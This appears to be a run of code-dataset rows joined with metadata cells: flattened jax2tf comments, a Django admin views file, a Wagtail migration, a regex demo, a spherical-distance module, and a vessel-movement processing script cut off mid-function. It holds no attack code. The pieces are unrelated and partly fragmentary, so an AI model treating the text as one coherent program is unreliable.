Since the TensorFlowTrace is never nested inside another transform, there are no lower-level main traces. This is called when we need to raise a tracer from the same master, but a lower sublevel. This could come from a nested jit. type: ignore type: ignore type: ignore Check that the impl rule returned a value of expected shape and dtype TODO: adapt this to match polymorphic shapes type: ignore type: ignore type: ignore type: ignore We encountered a call primitive, e.g., remat_call_p, whose result (out_tracers) include TensorFlowTracer that were not passed through its arguments (captured from the environment). Drop the custom differentiation rule and act like a call primitive. This behavior is desirable because jax2tf stages code out of the JAX system, so there are no more JAX differentiation transformations to be applied. Unused. unreachable assuming jax2tf runs with clean trace state Drop the custom differentiation rule and act like a call primitive. This behavior is desirable because jax2tf stages code out of the JAX system, so there are no more JAX differentiation transformations to be applied. Unused. unreachable assuming jax2tf runs with clean trace state Returns the primitive implementation and whether the implementation takes abstract values (see definition of tf_impl_with_avals) Call primitives are inlined Primitives that are not yet implemented must be explicitly declared here. Not high priority? TF and XLA do not support tf.math.sign for unsigned types. TF and XLA do not support tf.math.abs for unsigned types. Follows the implementation in lax._integer_pow_translation_rule The only dtypes that are allowed are: float32, float64, complex64, and complex128. Some dtypes are unsupported, like uint32, so we just fall back to int32. TODO(mattjj, necula): improve tf.range dtype handling Map from TF signed types to TF unsigned types. Map from TF unsigned types to TF signed types. Note: Bitwise operations only yield identical results on unsigned integers! 
pylint: disable=protected-access TF shift is "implementation defined" if the shift amount is negative or larger or equal to the size of the value. We implement the XLA semantics to return the shift by the max value (x_bits - 1). TODO: it is likely better to add XlaOps for shifts TF shift is "implementation defined" if the shift amount is negative or larger or equal to the size of the value. We implement the XLA semantics to return 0. TODO: it is likely better to add XlaOps for shifts TF shift is "implementation defined" if the shift amount is negative or larger or equal to the size of the value. We implement the XLA semantics to return 0. TODO: it is likely better to add XlaOps for shifts Return the TF expression for when y is within bounds (0 <= y < |x|) TF does not have comparisons for uint16 and uint32 (despite what the documentation says) The below permits mirroring the behavior of JAX when maxval < minval TODO(bchetioui): this function is not exhaustive wrt which convolution cases can be translated into TF primitives. Further investigation is needed to fully flesh it out. TODO(bchetioui): is there something to do with batch_group_count? TF can only deal with 1D, 2D and 3D convolution TODO(bchetioui): handle different stride cases TODO(bchetioui): in this instance, we can not use padtype_to_pads as string padding is not implemented for transposed convolution. TF only allows 'VALID' and 'SAME' padding TF only allows filters with shape: spatial_filter_shape + [in_channels, out_channels]. In JAX however, rhs_spec is represented as a tuple containing the following: [out_channels, in_channels] + spatial_filter_shape. TF only supports same LHS and output data format Alphabet extracted from the documentation of tf.conv{1,2,3}d TF only supports the following data formats: - [batch_size, in_channels] + input_spatial_shape TODO(bchetioui): TF currently does not support the above on CPU. To avoid failing on this platform, this path is commented out for now. 
if list(lhs_spec) == list(range(len(lhs_spec))): return "NC" + spatial_dim_alphabet - [batch_size] + input_spatial_shape + [in_channels] TODO(bchetioui): is there a generic way to do a transposed atrous convolution in TensorFlow? This is a non-dilated or atrous convolution TODO(bchetioui): the below path is unreachable for now, as passing a lhs dilation to this function will result in convert_padding returning None systematically. This must be investigated further. Dilation of the LHS is transposed convolution TODO(necula): implement batch_group_count TODO: implement shape inference for XlaConv Follow the lowering for complex convolutions from lax._conv_general_dilated_translation. We can use the same conversion on all platforms because on XLA:TPU the compiler does the same as a rewrite. Convert complex dtype to types used for real and imaginary parts TODO: in presence of None dimensions, XlaDot shape inference returns unknown shape. This condition ensures that: 1) the batch dimensions are ordered in the same way in lhs and rhs (this is not strictly necessary, but we would have to reshape the array if that were not the case; 2) lhs and rhs have the same number of dimensions +/- 1 3) the number of non-batch dimensions in both tensors is either 1 or 2 4) the contracting dimensions are consistent with those of a classic matrix/matrix, vector/matrix or matrix/vector multiplication. All the inputs to tf.linalg.matmul must have 2 inner dimensions, after their batch dimensions, so we need to expand the dimensions appropriately. We can get to this branch with three combinations of inner shapes: - lhs.inner_shape == [a, b], rhs.inner_shape == [b, c] - in this case, the resulting inner shape is [a, c]; - lhs.inner_shape == [b] , rhs.inner_shape == [b, c] - in this case, we need to expand lhs to [1, b], and the resulting shape is [c]. 
We need to squeeze the result of tf.linalg.matmul as it will have shape [1, c]; - lhs.shape == [batch] + [a, b], rhs.shape == [batch] + [b] - in this case, we need to expand rhs to [b, 1], and the resulting shape is [a]. We need to squeeze the result of tf.linalg.matmul as it will have shape [a, 1]; - lhs.shape == [batch] + [b] , rhs.shape == [batch] + [b] - in this case, we need to expand lhs to [1, b] and rhs to [b, 1], and the resulting shape is (). We need to squeeze the result of tf.linalg.matmul as it will have shape [1, 1]. type: ignore[call-overload] type: ignore[call-overload] type: ignore[call-overload] type: ignore[call-overload] TODO(phawkins): handle axes larger than 2^31. Note: this function follows the pattern in jax.lax._select_and_gather_add_translation. Specializing the function for 64 bits. Only up to 32 bits are supported on TPU, we thus intend to let the code throw a different exception on this platform. Packs two values into a tuple. Unpacks the first element of a tuple. Unpacks the second element of a tuple. TODO: implement shape inference for XlaReduceWindow _try_tf_pool currently only supports reduce_window_max and reduce_window_sum. TODO(bchetioui): this function is not exhaustive wrt which reduce_window_max or reduce_window_sum cases can be translated into a call to max_pool or avg_pool. Further investigation is needed to fully flesh it out. Contrarily to the main path, tf.int8 is actually a valid type for tf.nn.max_pool. TODO(bchetioui): does a simple conversion with another base dilation exist? TODO(bchetioui): does a simple conversion with another window_dilation exist? The whole story seems similar to convolution. 
ReduceWindow in XLA takes an array of rank N as a parameter, but tf.nn.max_pool / tf.nn.avg_pool take an array of rank N+2, with a default shape of the form [batch_size] + input_spatial_shape + [num_channels] pylint: disable=protected-access pylint: enable=protected-access We use lax_control_flow._cumred_tpu_translation_rule to convert cummax, cummin, cumsum and cumprod. This is efficient on TPU, but the complexity is O(n^2) on other backends. This may be implemented using associative_scan instead to favor different backends. TODO(bchetioui): cumsum and cumprod can be converted using pure TF ops for certain dtypes: bfloat16, float16, float32, float64, and int32. Other dtypes will fail when running in compiled mode, but are otherwise compatible with the operation. A non-XLA path can thus be defined for all dtypes, though the tests will crash. Use the vmap implementation, otherwise on TPU the performance is really bad With use_vmap=True on, we get about the same performance for JAX and jax2tf. TODO(b/184503314): improve shape inference for __getitem__ Here we could use tf.slice. Similarly, for lax.gather we can sometimes use tf.gather. But those have different semantics for index-out-of-bounds than JAX (and XLA). We have tried to force compilation, by wrapping into tf.xla.experimental.compile, or tf.function(jit_compile=True), but those solutions are brittle because they do not work when nested into an outer compilation (see b/162814494 and b/163006262). They also do not survive well being put in a SavedModel. Hence, we now use TFXLA slicing and gather ops. TODO: implement shape inference for XlaDynamicSlice TODO: implement shape analysis for XlaScatter tf.cond needs lambdas with no arguments. type: ignore[attr-defined] The conditional is not a scalar, this must be a batched while The conditional must return a single value to TF Initial computation of batched condition We use the scan impl rule to rewrite in terms of while. 
Some types originally incompatible with tf.math.top_k can be promoted to a compatible type without loss of precision. The comparator is a 2N-argument TF function, with arguments [2k] and [2k +1] corresponding to two scalars from operand[k]. We build a comparison: arg[0] < arg[1] or (arg[0] == arg[1] and (arg[2] < arg[3] or ...)) all the way to arg[2 * num_keys - 2] < arg[2 * num_keys - 1] Use the same comparator that JAX uses when compiling to XLA, to get the proper NaN/Inf total order, and the lexicographic ordering. The comparator is a 2N-argument TF function, with arguments [2k] and [2k +1] corresponding to two scalars from operand[k]. TODO(bchetioui): didn't find a 100% reliable, easy and satisfying way to sort the left eigenvectors in the right order. The jax.numpy.linalg API suggests to me that left eigenvectors are anyway seldom used, so I think it is acceptable to leave as unimplemented for now. compute_left_eigenvectors == True adjoint == transpose for real dtypes, so special care need only be taken for complex types. TODO(necula): ensure that there is no AD transformation in scope TODO(necula): ensure that there is no AD transformation in scope This corresponds to the sharding annotations in xla_bridge._sharding_to_proto. caller handles new_sublevel The types here are automagically changed by TensorFlow's checkpointing infrastructure. TF AutoTrackable swaps container types out for wrappers. | 29,260 | en | 0.780508 |
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, get_object_or_404, redirect
from django.template import loader
from django.http import HttpResponse
from django import template
from mainsite.forms import NewsCreate
from mainsite.models import News, ContactForm, Issue
@login_required(login_url="/admin-panel/login/")
def index(request):
    """Render the admin-panel dashboard landing page."""
    context = {"segment": "index"}
    dashboard_template = loader.get_template('index.html')
    return HttpResponse(dashboard_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def profile(request):
    """Render the current user's profile page."""
    context = {"segment": "profile"}
    profile_template = loader.get_template('page-user.html')
    return HttpResponse(profile_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def news(request):
    """List every News object in the admin panel.

    The context key must remain "list" because news.html reads it;
    only the local variable was renamed to stop shadowing the builtin.
    """
    news_list = News.objects.all()  # was `list`, which shadowed the builtin
    context = {"list": news_list, "segment": "news"}
    html_template = loader.get_template('news.html')
    return HttpResponse(html_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def add_news(request):
    """Create a News entry via the NewsCreate form.

    GET renders an empty form; POST validates and saves, then redirects to
    the news list. Fixes two defects: the view was the only admin view
    without @login_required (unauthenticated users could create news), and
    the invalid-form response contained a literal, unrendered
    `{{ url : ... }}` expression instead of a working link.
    """
    upload = NewsCreate()
    if request.method == 'POST':
        upload = NewsCreate(request.POST, request.FILES)
        if upload.is_valid():
            upload.save()
            return redirect('/admin-panel/news')
        # Invalid form: give the user a working link back to the news list.
        return HttpResponse(
            """your form is wrong, reload on <a href="/admin-panel/news">reload</a>""")
    context = {
        "upload_form": upload,
        "action": "Добавить"
    }
    return render(request, 'add-news.html', context)
@login_required(login_url="/admin-panel/login/")
def update_news(request, news_id: int):
    """Edit an existing News entry; redirect to the list when done.

    Fixes: the except clause referenced `news` (the sibling view function,
    which has no DoesNotExist attribute) and would raise AttributeError
    instead of handling a missing record; and a GET request bound the empty
    POST QueryDict to the form, showing spurious validation errors.
    """
    try:
        news_sel = News.objects.get(pk=news_id)
    except News.DoesNotExist:  # was `news.DoesNotExist` -> AttributeError
        return redirect('/admin-panel/news')
    # Bind POST data only when present so a GET shows a clean pre-filled form.
    news_form = NewsCreate(request.POST or None, request.FILES or None,
                           instance=news_sel)
    if news_form.is_valid():
        news_form.save()
        return redirect('/admin-panel/news')
    context = {
        "ProductForm": news_form,
        "ProductModel": news_sel,
        "action": "Обновить"
    }
    return render(request, 'add-news.html', context)
@login_required(login_url="/admin-panel/login/")
def delete_news(request, news_id):
    """Delete the News entry with the given primary key, then redirect.

    Fixes: the except clause was `news_id.DoesNotExist` — an attribute
    lookup on an int, which raises AttributeError instead of catching the
    missing-record case. Model exceptions live on the model class.
    """
    news_id = int(news_id)
    try:
        news_sel = News.objects.get(pk=news_id)
    except News.DoesNotExist:  # was `news_id.DoesNotExist` -> AttributeError
        return redirect('/admin-panel/news')
    news_sel.delete()
    return redirect('/admin-panel/news')
@login_required(login_url="/admin-panel/login/")
def contactforms(request):
    """List every submitted ContactForm in the admin panel.

    The context key must remain "list" (contact-forms.html reads it);
    only the local variable was renamed to stop shadowing the builtin.
    """
    contact_list = ContactForm.objects.all()  # was `list` (shadowed builtin)
    context = {"list": contact_list, "segment": "contactforms"}
    html_template = loader.get_template('contact-forms.html')
    return HttpResponse(html_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def requests(request):
    """List every Issue (support request) in the admin panel.

    The context key must remain "list" (requests.html reads it);
    only the local variable was renamed to stop shadowing the builtin.
    """
    issue_list = Issue.objects.all()  # was `list` (shadowed builtin)
    context = {"list": issue_list, "segment": "requests"}
    html_template = loader.get_template('requests.html')
    return HttpResponse(html_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def delete_contact_form(request, contact_id):
    """Delete the ContactForm entry with the given primary key, then redirect.

    Fixes: the except clause was `contact_id.DoesNotExist` — an attribute
    lookup on an int, which raises AttributeError instead of catching the
    missing-record case. Model exceptions live on the model class.
    """
    contact_id = int(contact_id)
    try:
        contact_sel = ContactForm.objects.get(pk=contact_id)
    except ContactForm.DoesNotExist:  # was `contact_id.DoesNotExist`
        return redirect('/admin-panel/contacts')
    contact_sel.delete()
    return redirect('/admin-panel/contacts')
@login_required(login_url="/admin-panel/login/")
def pages(request):
    """Serve any admin template named by the last URL path segment.

    All resource paths end in .html; the template name is the final path
    component. Unknown templates render page-404.html; any other rendering
    failure renders page-500.html.

    Fixes: the final handler was a bare `except:`, which also swallowed
    SystemExit and KeyboardInterrupt; narrowed to `except Exception`.
    """
    context = {}
    try:
        load_template = request.path.split('/')[-1]
        context['segment'] = load_template
        html_template = loader.get_template(load_template)
        return HttpResponse(html_template.render(context, request))
    except template.TemplateDoesNotExist:
        html_template = loader.get_template('page-404.html')
        return HttpResponse(html_template.render(context, request))
    except Exception:  # was bare `except:`
        html_template = loader.get_template('page-500.html')
        return HttpResponse(html_template.render(context, request))
| app/views.py | 4,252 | All resource paths end in .html. Pick out the html file name from the url. And load that template. | 98 | en | 0.812652 |
# Generated by Django 2.2.3 on 2019-08-07 13:29
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.blocks
import wagtail.core.fields
class Migration(migrations.Migration):
    """Auto-generated schema migration (Django 2.2.3, 2019-08-07).

    Adds three Wagtail page models to the cms app:
      * CertificatePage    - course/program certificate with optional CEUs
        and a stream of up to 5 signatory page choosers
      * SignatoryIndexPage - bare container/index page for signatories
      * SignatoryPage      - one signatory: name, up to two titles,
        organization, and an optional signature image

    NOTE: generated code — do not hand-edit the operations; create a new
    migration for any schema change.
    """

    dependencies = [
        ("wagtailimages", "0001_squashed_0021"),
        ("wagtailcore", "0041_group_collection_permissions_verbose_name_plural"),
        ("cms", "0040_whoshouldenrollpage_heading"),
    ]

    operations = [
        # Certificate page: inherits wagtailcore.Page via page_ptr.
        migrations.CreateModel(
            name="CertificatePage",
            fields=[
                (
                    "page_ptr",
                    models.OneToOneField(
                        auto_created=True,
                        on_delete=django.db.models.deletion.CASCADE,
                        parent_link=True,
                        primary_key=True,
                        serialize=False,
                        to="wagtailcore.Page",
                    ),
                ),
                (
                    "product_name",
                    models.CharField(
                        help_text="Specify the course/program name.", max_length=250
                    ),
                ),
                (
                    "CEUs",
                    models.CharField(
                        blank=True,
                        help_text="Optional text field for CEU (continuing education unit).",
                        max_length=250,
                        null=True,
                    ),
                ),
                (
                    "signatories",
                    wagtail.core.fields.StreamField(
                        [
                            (
                                "signatory",
                                wagtail.core.blocks.PageChooserBlock(
                                    page_type=["cms.SignatoryPage"], required=True
                                ),
                            )
                        ],
                        help_text="You can choose upto 5 signatories.",
                    ),
                ),
            ],
            options={"verbose_name": "Certificate"},
            bases=("wagtailcore.page",),
        ),
        # Index page: no fields of its own beyond the Page link.
        migrations.CreateModel(
            name="SignatoryIndexPage",
            fields=[
                (
                    "page_ptr",
                    models.OneToOneField(
                        auto_created=True,
                        on_delete=django.db.models.deletion.CASCADE,
                        parent_link=True,
                        primary_key=True,
                        serialize=False,
                        to="wagtailcore.Page",
                    ),
                )
            ],
            options={"abstract": False},
            bases=("wagtailcore.page",),
        ),
        # Signatory detail page; signature image is SET_NULL so deleting an
        # image does not delete the signatory.
        migrations.CreateModel(
            name="SignatoryPage",
            fields=[
                (
                    "page_ptr",
                    models.OneToOneField(
                        auto_created=True,
                        on_delete=django.db.models.deletion.CASCADE,
                        parent_link=True,
                        primary_key=True,
                        serialize=False,
                        to="wagtailcore.Page",
                    ),
                ),
                (
                    "name",
                    models.CharField(
                        help_text="Name of the signatory.", max_length=250
                    ),
                ),
                (
                    "title_1",
                    models.CharField(
                        blank=True,
                        help_text="Specify signatory first title in organization.",
                        max_length=250,
                        null=True,
                    ),
                ),
                (
                    "title_2",
                    models.CharField(
                        blank=True,
                        help_text="Specify signatory second title in organization.",
                        max_length=250,
                        null=True,
                    ),
                ),
                (
                    "organization",
                    models.CharField(
                        blank=True,
                        help_text="Specify the organization of signatory.",
                        max_length=250,
                        null=True,
                    ),
                ),
                (
                    "signature_image",
                    models.ForeignKey(
                        blank=True,
                        help_text="Signature image size must be at least 150x50 pixels.",
                        null=True,
                        on_delete=django.db.models.deletion.SET_NULL,
                        related_name="+",
                        to="wagtailimages.Image",
                    ),
                ),
            ],
            options={"verbose_name": "Signatory"},
            bases=("wagtailcore.page",),
        ),
    ]
| cms/migrations/0041_certificatepage_signatoryindexpage_signatorypage.py | 5,071 | Generated by Django 2.2.3 on 2019-08-07 13:29 | 45 | en | 0.612438 |
#!python3.6
# coding:utf-8
# Demonstrates regex.finditer(string[, pos[, endpos]]) and Match attributes.
import re

# ^ anchors at the start of the string, so only targets beginning "ab" match.
regex = re.compile(r'^ab')
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB', 'ABcd']:
    print(target, regex.finditer(target))
print()

# Same anchor, case-insensitive: 'ABcd' now matches too.
regex = re.compile(r'^ab', re.IGNORECASE)
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB', 'ABcd']:
    print(target, regex.finditer(target))
print()

# Unanchored: every occurrence of "ab" (any case) yields a match.
regex = re.compile(r'ab', re.IGNORECASE)
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB', 'ABcd']:
    print(target, regex.finditer(target))
print()

# pos/endpos restrict the searched region without slicing the string.
regex = re.compile(r'ab', re.IGNORECASE)
print(regex)
pos = 2
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB']:
    print(target, regex.finditer(target, pos, endpos=len(target)))
print()

regex = re.compile(r'ab', re.IGNORECASE)
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB']:
    # BUG FIX: finditer returns an iterator of Match objects, not a Match;
    # the original called Match methods on the iterator itself and raised
    # AttributeError. Iterate and inspect each Match instead.
    for match in regex.finditer(target, pos, endpos=len(target)):
        print(target, match)
        print(' match.expand():', match.expand('XY'))
        print(' match.group():', match.group())
        print(' match.groups():', match.groups())
        print(' match.groupdict():', match.groupdict())
        print(' match.start():', match.start())
        print(' match.end():', match.end())
        print(' match.span():', match.span())
        print(' match.pos:', match.pos)
        print(' match.endpos:', match.endpos)
        print(' match.lastindex:', match.lastindex)
        print(' match.lastgroup:', match.lastgroup)
        print(' match.re:', match.re)
        print(' match.string:', match.string)
| 13/00/finditer.py | 1,673 | !python3.6coding:utf-8regex.finditer(string[, pos[, endpos]])AttributeError: 'list' object has no attribute 'expand' | 116 | en | 0.456734 |
import numpy as np
from .transform import sph2vec, vec2sph
def angle_between(ang1, ang2, sign=True):
    """Smallest difference between two angles (radians), in [-pi, pi).

    Returns the signed difference ang1 - ang2 by default; with sign=False
    the absolute difference is returned instead.
    """
    diff = np.mod(ang1 - ang2 + np.pi, 2 * np.pi) - np.pi
    return diff if sign else np.abs(diff)
def angdist(v1, v2, zenith=True):
    """Angular distance (radians) between two directions.

    Each argument is either a 3D unit-sphere vector (first axis length 3)
    or a spherical (elevation, azimuth) pair (first axis length 2), which
    is converted to a vector via sph2vec. Batched inputs (2-D arrays, one
    direction per column) are supported.

    Fixes: the original normalized with `v1 /= ...`, mutating the caller's
    arrays in place; normalization is now done on fresh arrays. Dead
    commented-out code removed.
    """
    if v1.shape[0] == 2:
        v1 = sph2vec(v1, zenith=zenith)
    if v2.shape[0] == 2:
        v2 = sph2vec(v2, zenith=zenith)
    # normalise on copies — do not mutate the caller's arrays
    v1 = v1 / np.linalg.norm(v1, axis=0)
    v2 = v2 / np.linalg.norm(v2, axis=0)
    if v1.ndim > 1 or v2.ndim > 1:
        # column-wise dot products for batched input
        d = np.einsum('ij,ij->j', v1, v2)
    else:
        d = np.dot(v1.T, v2)
    return np.absolute(np.arccos(d))
def eledist(v1, v2, zenith=True):
    """Absolute elevation difference (radians) between two directions.

    3D vectors (first axis length 3) are converted to spherical
    coordinates via vec2sph first; index 0 holds the elevation.
    """
    if v1.shape[0] == 3:
        v1 = vec2sph(v1, zenith=zenith)
    if v2.shape[0] == 3:
        v2 = vec2sph(v2, zenith=zenith)
    delta = np.mod(v1[0] - v2[0] + np.pi, 2 * np.pi) - np.pi
    return np.absolute(delta)
def azidist(v1, v2, zenith=True):
    """Absolute azimuth difference (radians) between two directions.

    3D vectors (first axis length 3) are converted to spherical
    coordinates via vec2sph first; index 1 holds the azimuth.
    """
    if v1.shape[0] == 3:
        v1 = vec2sph(v1, zenith=zenith)
    if v2.shape[0] == 3:
        v2 = vec2sph(v2, zenith=zenith)
    delta = np.mod(v1[1] - v2[1] + np.pi, 2 * np.pi) - np.pi
    return np.absolute(delta)
| sphere/distance.py | 1,142 | if d.ndim > 1: d = d.diagonal() | 35 | en | 0.119764 |
# Copyright 2020 The Maritime Whale Authors. All rights reserved.
# Use of this source code is governed by an MIT-style license that can be
# found in the LICENSE.txt file.
#
# Processes wind and vessel data. Performs simple analysis.
from match_wind_data import *
from datetime import *
from meet_and_pass import *
import pandas as pd
import math
import sys
# TODO: need to generalize this to apply to any port desired; will need to
# do the same for main, run, plot, etc
# Vessel (AIS) types that should be automatically purged from analysis
# (tugs, pilot/port-tender/law-enforcement craft, etc.);
# see details at https://api.vesselfinder.com/docs/ref-aistypes.html
AUTO_BLACKLIST = [30, 31, 32, 33, 34, 35, 36, 37, 51, 52, 53, 55, 57, 58, 59]
SUB_PANAMAX = 656 # LOA threshold in feet; shorter vessels are excluded
M_TO_FT = 3.28 # meters to feet (conversion factor)
def _sanitize_vmr(df):
"""Filters entries with '511' error, impossibly high speed, abnormally
high vessel width, as well as singletons (only one entry) from vessel
movement DataFrame.
Args:
df: Vessel movement DataFrame.
Returns:
Sanitized vessel movement report DataFrame.
"""
df = df.loc[~df.index.isin(df[df.loc[:, "Beam ft"] >= 500].index), :]
df = df.loc[~df.index.isin(df[df.loc[:, "Course"] == 511].index), :]
df = df.loc[~df.index.isin(df[df.loc[:, "Heading"] == 511].index), :]
df = df.loc[~df.index.isin(df[df.loc[:, "VSPD kn"] >= 40].index), :]
singleton = (df.loc[:, "MMSI"].value_counts() == 1)
single_mmsi = df.loc[:, "MMSI"].value_counts()[singleton].index.values
df = df.loc[~df.loc[:, "MMSI"].isin(single_mmsi), :]
return df
def _wrangle_vmr(df, rename):
    """Round, rename, and sanitize a vessel movement DataFrame.

    Derives LOA/Beam in feet from the AIS A/B/C/D extents, rounds the
    coordinates, drops bad rows via _sanitize_vmr, filters out
    sub-panamax vessels, and parses the UTC timestamp column.

    Args:
        df: Vessel movement DataFrame.
        rename: Mapping of raw column names to canonical ones.

    Returns:
        Cleaned vessel movement report DataFrame (canonical columns only).
    """
    df.rename(rename, axis=1, inplace=True)
    # LOA = bow-to-stern (A+B), beam = port-to-starboard (C+D), in feet
    df["LOA ft"] = ((df["A"] + df["B"]) * M_TO_FT).round(0)
    df["Beam ft"] = ((df["C"] + df["D"]) * M_TO_FT).round(0)
    df["Latitude"] = df["Latitude"].round(5)
    df["Longitude"] = df["Longitude"].round(5)
    df = _sanitize_vmr(df)
    # keep panamax-class and larger vessels only
    df = df[df["LOA ft"] >= SUB_PANAMAX]
    df["Date/Time UTC"] = pd.to_datetime(df["Date/Time UTC"].str.strip("UTC"))
    wanted = ["Date/Time UTC", "Name", "MMSI", "LOA ft", "Latitude",
              "Longitude", "Course", "AIS Type", "Heading", "VSPD kn",
              "Beam ft"]
    return df.loc[:, wanted]
def _filter_blacklisters(df, blacklist):
    """Drop blacklisted vessels and auto-blacklist banned AIS types.

    Removes rows whose MMSI is already blacklisted, then finds rows whose
    AIS Type is in AUTO_BLACKLIST, appends those MMSIs to
    ../cache/blacklist.txt, and removes them too.

    Fixes: the row scan used an O(n) `df.iloc[j]` loop; replaced with a
    vectorized `isin` selection (same rows, same order).

    Args:
        df: Vessel movement DataFrame.
        blacklist: Iterable of already-blacklisted MMSIs.

    Returns:
        Filtered vessel movement DataFrame.
    """
    df = df[~df["MMSI"].isin(blacklist)]
    # vectorized replacement for the per-row iloc loop
    new_blacklisters = df.loc[df["AIS Type"].isin(AUTO_BLACKLIST),
                              "MMSI"].tolist()
    with open("../cache/blacklist.txt", "a") as f:
        contents = [str(mmsi) for mmsi in new_blacklisters]
        if contents:
            f.write("\n".join(contents) + "\n")
    return df[~df["MMSI"].isin(new_blacklisters)]
def _fold_vmr(ports, i):
    """Reduces movement report to a DataFrame with a single entry for each
    vessel at the point of its maximum speed in the channel. Includes a column
    with the vessel's mean speed.
    """
    # per-vessel mean speed, keyed by (Name, MMSI)
    mean = pd.DataFrame(ports[i].groupby(["Name", "MMSI"])["VSPD kn"]
           .mean()).rename({"VSPD kn": "Mean Speed kn"}, axis=1).round(1)
    # per-vessel maximum speed, keyed by (Name, MMSI)
    maxes = pd.DataFrame(ports[i].groupby(["Name", "MMSI"])["VSPD kn"]
            .max()).rename({"VSPD kn": "Max Speed kn"}, axis=1)
    merged_speeds = maxes.merge(mean, on=["Name", "MMSI"])
    # {(Name, MMSI): max speed} — used below to locate the max-speed row
    max_dict = merged_speeds.loc[:, "Max Speed kn"].to_dict()
    columns = {"Longitude":[], "Latitude":[], "Date/Time UTC":[],
               "LOA ft":[], "Course":[], "AIS Type":[], "WSPD mph":[],
               "GST mph":[], "WDIR degT":[], "Buoy Source":[], "Beam ft":[],
               "Heading":[], "Course Behavior":[], "Effective Beam ft":[],
               "Class":[], "Location":[], "Yaw deg":[], "Transit":[],
               "% Channel Occupied":[]}
    # grab remaining data based on max speed position
    # NOTE(review): the lookup matches rows by Name + max speed only (the
    # MMSI from the group key is unused), and .iloc[0] takes the first hit.
    # Two same-named vessels sharing a max speed could pick the wrong row —
    # confirm against the data.
    for key, value in max_dict.items():
        for k in columns.keys():
            columns[k].append(ports[i][(ports[i].loc[:, "Name"] == key[0]) &
                              (ports[i].loc[:, "VSPD kn"] == value)][k].iloc[0])
    for key in columns.keys():
        merged_speeds[key] = columns[key]
    merged_speeds = merged_speeds.reset_index()
    fold_res = merged_speeds
    # fastest vessels first
    fold_res.sort_values("Max Speed kn", ascending=False, inplace=True)
    return fold_res
def _add_channel_occ(ports, i):
"""Creates the channel occupancy column."""
# total channel width for CH and SV are 1000 and 600 ft respectively,
# but vary based on Class and transit condition
channel_width = [[800, 400, 1000, 500], [600, 300, 600, 300]]
# create % channel occupancy column for each vessel position based on
# effective beam, transit, and corresponding channel width
for row in range(len(ports[i])):
vessel_class = ports[i].loc[row, "Class"]
transit_type = ports[i].loc[row, "Transit"]
eff_beam = ports[i].loc[row, "Effective Beam ft"]
if ((vessel_class == "Post-Panamax") &
(transit_type == "One-way Transit")):
occ = (eff_beam / channel_width[i][0]) * 100
ports[i].loc[row, "% Channel Occupied"] = round(occ, 2)
elif ((vessel_class == "Post-Panamax") &
(transit_type == "Two-way Transit")):
occ = (eff_beam / channel_width[i][1]) * 100
ports[i].loc[row, "% Channel Occupied"] = round(occ, 2)
elif ((vessel_class == "Panamax") &
(transit_type == "One-way Transit")):
occ = (eff_beam / channel_width[i][2]) * 100
ports[i].loc[row, "% Channel Occupied"] = round(occ, 2)
elif ((vessel_class == "Panamax") &
(transit_type == "Two-way Transit")):
occ = (eff_beam / channel_width[i][3]) * 100
ports[i].loc[row, "% Channel Occupied"] = round(occ, 2)
else:
sys.stderr.write("Error: Undefined Class and " +
"transit combination...\n")
ports[i].loc[row, "% Channel Occupied"] = float("NaN")
return ports[i]
def _add_vessel_class(df):
"""Creates 'Class' column based on vessel LOA ft."""
df.loc[:, "Class"] = "Panamax"
post_row = (df.loc[:, "LOA ft"] > 965)
post_loc = df.loc[post_row, :].index
post_pan = df.index.isin(post_loc)
df.loc[post_pan, "Class"] = "Post-Panamax"
return df
def _course_behavior(df, ranges):
"""Creates 'Course Behavior' column based on channel specific course ranges.
"""
course_behavior = ("Outbound", "Inbound")
# filter on course ranges to isolate inbound and outbound ships only
df = df[(df.loc[:, "Course"] >= ranges[0][0]) &
(df.loc[:, "Course"] <= ranges[0][1]) |
(df.loc[:, "Course"] >= ranges[1][0]) &
(df.loc[:, "Course"] <= ranges[1][1])]
df.loc[:, "Course"] = round(df.loc[:, "Course"]).astype("int")
df.loc[:, "Course Behavior"] = df.loc[:, "Course"].copy()
# replace course values with general inbound and outbound behavior
courses = {}
for behavior, bounds in zip(course_behavior, ranges):
lower_bound = bounds[0]
upper_bound = bounds[1]
for j in range(lower_bound, upper_bound + 1):
courses[j] = behavior
df.loc[:, "Course Behavior"] = (df.loc[:, "Course Behavior"]
.replace(courses).astype("str"))
return df
def process_report(path):
    """Processes data from vessel movement report. Adds data from wind buoys,
    performs meeting and passing analysis. Creates other relevant columns.
    Args:
        path: Relative path to raw vessel movement report (CSV).
    Returns:
        Two pairs of two DataFrames corresponding to the movement report.
        The first pair of DataFrames contains all vessel movements belonging to
        Charleston and Savannah, respectively. The second pair of DataFrames
        stores the vessel movement entries at which each vessel achieved
        its maximum speed. Again, the first DataFrame in the pair belongs to
        Charleston and the second DataFrame belongs to Savannah.
    """
    # blacklist file holds one integer MMSI per line
    blacklist = [int(mmsi) for mmsi in open("../cache/blacklist.txt",
                                            "r").readlines()]
    df = pd.read_csv(path)
    # normalize raw report column names to the internal naming scheme
    df = _wrangle_vmr(df, {"DATETIME (UTC)": "Date/Time UTC", "NAME": "Name",
                           "LATITUDE": "Latitude", "LONGITUDE": "Longitude",
                           "SPEED": "VSPD kn", "COURSE": "Course", "HEADING":
                           "Heading", "AIS TYPE": "AIS Type"})
    ch_course_ranges = ((100, 140), (280, 320)) # (outbound, inbound)
    sv_course_ranges = ((100, 160), (280, 340)) # (outbound, inbound)
    # longitudinal channel midpoint for Charleston and Savannah respectively
    channel_midpoint = ((-79.74169), (-80.78522))
    course_ranges = (ch_course_ranges, sv_course_ranges)
    ports = [None, None] # ch, sv
    # Charleston NOAA wind buoy ID (41004)
    # Savannah NOAA wind buoy ID (41008)
    buoys = [{"41004":None}, {"41008":None}] # main wind buoys
    alt_buoys = [{"41008":None}, {"41004":None}] # alternate wind buoys
